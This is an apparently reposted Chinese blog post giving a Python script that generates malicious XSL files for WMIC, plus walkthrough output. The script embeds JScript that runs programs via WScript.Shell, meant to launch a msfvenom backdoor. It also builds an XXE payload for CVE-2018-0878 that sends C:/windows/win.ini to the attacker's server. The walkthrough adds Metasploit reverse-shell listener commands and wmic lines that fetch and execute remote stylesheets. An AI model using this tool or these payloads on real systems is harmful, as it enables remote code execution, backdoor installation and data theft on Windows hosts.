python打造XslGenerator

標籤：with   script   tran   not   img   parser   s/4   windows   headers   

0x00前言

今天載入了Demon哥分享的RSS。其中有一篇是三好學生講的：

 

 在仔細越讀這篇文章後，我懂得了裡面的一些騷操作，所以有了以下的

指令碼。

0x001代碼

 

import optparseimport timeimport osimport socketdef main():    parser=optparse.OptionParser()    parser.add_option(‘-b‘,dest=‘local‘,action=‘store_true‘,help=‘Generator Local Xsl‘)    parser.add_option(‘-y‘,dest=‘Long‘,action=‘store_true‘,help=‘Generator Long-range Xsl‘)    parser.add_option(‘-j‘,dest=‘CVE‘,action=‘store_true‘,help=‘Conduct CVE-2018-0878‘)    (options,args)=parser.parse_args()    if options.local:        Local()    elif options.Long:        Long()    elif options.CVE:        Cve()    else:        parser.print_help()        exit()def Local():    with open(‘poc.xsl‘,‘w‘) as l:        l.write(‘‘‘<?xml version="1.0"?><!-- Copyright (c) Microsoft Corporation.  All rights reserved. --><xsl:stylesheet version="1.0"      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"      xmlns:msxsl="urn:schemas-microsoft-com:xslt"      xmlns:user="urn:my-scripts"><xsl:output encoding="utf-16" omit-xml-declaration="yes"/><xsl:param name="norefcomma"/><msxsl:script language="JScript" implements-prefix="user">   function myFunction() {    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");          return "";         }</msxsl:script><xsl:template match="/"><xsl:value-of select="user:myFunction()"/>Node,<xsl:for-each select="COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY|COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY.ARRAY|COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY.REFERENCE"><xsl:value-of select="@NAME"/><xsl:if test="position()!=last()">,</xsl:if></xsl:for-each><xsl:apply-templates select="COMMAND/RESULTS"/></xsl:template> <xsl:template match="RESULTS" xml:space="preserve"><xsl:apply-templates select="CIM/INSTANCE"/></xsl:template> <xsl:template match="VALUE.ARRAY" xml:space="preserve">{<xsl:for-each select="VALUE"><xsl:apply-templates select="."/><xsl:if test="position()!=last()">;</xsl:if></xsl:for-each>}</xsl:template><xsl:template match="VALUE" xml:space="preserve"><xsl:value-of select="."/></xsl:template><xsl:template match="INSTANCE" xml:space="preserve"><xsl:value-of select="../../@NODE"/>,<xsl:for-each select="PROPERTY|PROPERTY.ARRAY|PROPERTY.REFERENCE"><xsl:apply-templates select="."/><xsl:if test="position()!=last()">,</xsl:if></xsl:for-each></xsl:template> <xsl:template match="PROPERTY.REFERENCE" xml:space="preserve"><xsl:apply-templates select="VALUE.REFERENCE"></xsl:apply-templates></xsl:template><xsl:template match="PROPERTY"><xsl:apply-templates select="VALUE"/></xsl:template><xsl:template match="PROPERTY.ARRAY"><xsl:for-each select="VALUE.ARRAY"><xsl:apply-templates select="."/></xsl:for-each></xsl:template><xsl:template match="VALUE.REFERENCE">"<xsl:apply-templates select="INSTANCEPATH/NAMESPACEPATH"/><xsl:apply-templates select="INSTANCEPATH/INSTANCENAME|INSTANCENAME"/>"</xsl:template><xsl:template match="NAMESPACEPATH">\\<xsl:value-of select="HOST/text()"/><xsl:for-each select="LOCALNAMESPACEPATH/NAMESPACE">\<xsl:value-of select="@NAME"/></xsl:for-each>:</xsl:template><xsl:template match="INSTANCENAME"><xsl:value-of select="@CLASSNAME"/><xsl:for-each select="KEYBINDING"><xsl:if test="position()=1">.</xsl:if><xsl:value-of select="@NAME"/>="<xsl:value-of select="KEYVALUE/text()"/>"<xsl:if test="position()!=last()"></xsl:if><xsl:if test="not($norefcomma=&quot;true&quot;)">,</xsl:if><xsl:if test="$norefcomma=&quot;true&quot;"><xsl:text> </xsl:text></xsl:if></xsl:for-each></xsl:template></xsl:stylesheet>        ‘‘‘)        l.close()        print(‘[*]{}‘.format(‘Generation completion‘))        print(‘[*]{}‘.format(‘you want to bounce meterpreter.Please create the back door and put the generated back door inito the clear computer,and use modify.py to modify the place where exe is executed‘))        print(‘[*]{}‘.format(‘Enter the directory where you store poc.xsl and exeute the command in the target computer: wmic os get format:poc‘))def Long():    with open(‘Longpoc.xsl‘,‘w‘) as g:        g.write(‘‘‘<?xml version=‘1.0‘?><stylesheetxmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"xmlns:user="placeholder"version="1.0"><output method="text"/>    <ms:script implements-prefix="user" language="JScript">    <![CDATA[    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");    ]]> </ms:script></stylesheet>        ‘‘‘)        g.close()        print(‘[*]{}‘.format(‘Generation completion‘))        os.system(‘mv Longpoc.xsl /var/www/html‘)        print(‘[*]{}‘.format(‘This XSL is moved to the /var/www/html directory‘))        print(‘[*]{}‘.format(‘Modify the program executed in XLS with modify.py‘))        print(‘[*]{}‘.format(‘Put the generated back door into the target computer‘))        print(‘[*]{}‘.format(‘Start the Apache service‘))        print(‘[*]{}‘.format(‘wmic os get format:"http://IP/Longpoc.xsl"‘))def Cve():    print(‘[@]Vulnerability introduction:https://www.exploit-db.com/exploits/44352/‘)    s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)    connect=s.connect((‘8.8.8.8‘,80))    ip=s.getsockname()[0]    ml="python -m SimpleHTTPServer 8080"    with open(‘xxe.xml‘,‘w‘) as c:        c.write(‘‘‘<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">  <!ENTITY % root "<!ENTITY &#37; oob SYSTEM ‘http://{}/?%payload;‘> ">          ‘‘‘.format(ip))        c.close()        os.system(‘mv payload.xls /var/www/html‘)    with open(‘payload.xsl‘,‘w‘) as p:        p.write(‘‘‘<?xml version="1.0" encoding="UTF-8" ?>  <!DOCTYPE zsl [  <!ENTITY % remote SYSTEM "http://{}:8080/xxe.xml">  %remote;%root;%oob;]>        ‘‘‘.format(ip))        p.close()        print(‘[*]{}‘.format(‘Get the native IP:‘,ip))        print(‘[*]{}‘.format(‘Create a httt server‘))        print(‘[*]{}‘.format(‘Have been created xxe.xml‘))        print(‘[*]{}‘.format(‘Already moved /var/www/html‘))        print(‘[*]{}‘.format(‘Have benn payload.xls,Move him to the computer,And execute the command:wmic os get format:payload.xsl‘))        os.system(ml)if __name__ == ‘__main__‘:    main()

測試結果： -b

攻擊機：Ubuntu

受害者：windows server 2008 r2

產生後並修改後的的xsl

msfvenom產生的shell.exe

 Windows Server 2008 r2

 進入shell.exe所在的目錄中在cmd中執行：wmic os get /format:sd

Ubuntu中執行監聽：

use exploit/multi/headersset LHOST 192.168.223.133set LPORT 4444set PAYLOAD windows/x64/meterpreter/reverse_tcprun

測試結果：-j   CVE-2018-0878

漏洞結果詳情：https://www.exploit-db.com/exploits/44352/

產生了xxe.xml與payload.xls

xxe.xml移動到了/var/www/html  

payload.xls放入到受害者windows server 2008 r2

xxe.xml:

<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">  <!ENTITY % root "<!ENTITY &#37; oob SYSTEM ‘http://192.168.223.133:8080/?%payload;‘> ">  

payload.xsl:

<?xml version="1.0" encoding="UTF-8" ?>  <!DOCTYPE zsl [  <!ENTITY % remote SYSTEM "http://192.168.223.133:8080/xxe.xml">  %remote;%root;%oob;]>

 啟動apache服務

service apache2 start

在windows server 2008 r2中執行：

wmic os get /format:payload.xsl

執行失敗但漏洞觸發成功了。

 

這裡的-b選項我就不示範了，具體步驟跟上面兩個差不多

1.產生的poc.xsl修改在目標機上執行的程式並移動到apache2

2.開啟apache2

3.將產生的後門扔到目標機

4.執行wmic os get /format:"http://192.168.223.133/poc.xsl"

這時候wmic就會請求xsl並執行。你如果此刻在監聽你就收到了一個shell

 

python打造XslGenerator